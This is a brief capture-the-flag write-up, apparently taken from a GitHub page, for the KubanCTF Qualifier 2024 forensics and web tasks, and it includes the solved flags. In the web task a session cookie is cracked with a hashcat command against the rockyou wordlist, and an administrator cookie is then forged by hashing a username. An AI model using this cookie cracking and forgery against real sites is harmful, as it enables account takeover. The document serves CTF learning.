KubanCTF Qualifier 2024 Write-up

Not broken

File -> export object -> HTTP

Save largest packet and open it

We can see that is request to image

Delete everything up to %PNG and save as a png file

WEB

WEB - Примечание

Request

GET /profile.php HTTP/1.1
Host: 62.173.147.143:16004
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.216 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://62.173.147.143:16004/
Accept-Encoding: gzip, deflate, br
Accept-Language: ru-RU,ru;q=0.9
Cookie: Token=ecd71870d1963316a97e3ac3408c9835ad8cf0f3c1bc703527c30265534f75ae
Connection: close

Our token is ecd71870d1963316a97e3ac3408c9835ad8cf0f3c1bc703527c30265534f75ae

hashcat ecd71870d1963316a97e3ac3408c9835ad8cf0f3c1bc703527c30265534f75ae

hashcat -m 1400 -a 0 'ecd71870d1963316a97e3ac3408c9835ad8cf0f3c1bc703527c30265534f75ae' /home/kali/wordlist/rockyou.txt

cd71870d1963316a97e3ac3408c9835ad8cf0f3c1bc703527c30265534f75ae:test123

administrator@codeby.games

echo -n 'administrator' | sha256sum

4194d1706ed1f408d5e02d672777019f4d5385c766a8c6ca8acba3167d36a7b9

FLAG:

CSC{sup3r_w34k_co0ki3}

WEB - What's missing?

FLAG:

CSC{7H3_L1M174710NS_4R3_0NLY_1N_0UR_H34DS}

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

KubanCTF Qualifier 2024.md

KubanCTF Qualifier 2024.md

KubanCTF Qualifier 2024 Write-up

Not broken

WEB

WEB - Примечание

WEB - What's missing?

Files

KubanCTF Qualifier 2024.md

Latest commit

History

KubanCTF Qualifier 2024.md

File metadata and controls

KubanCTF Qualifier 2024 Write-up

Not broken

WEB

WEB - Примечание

WEB - What's missing?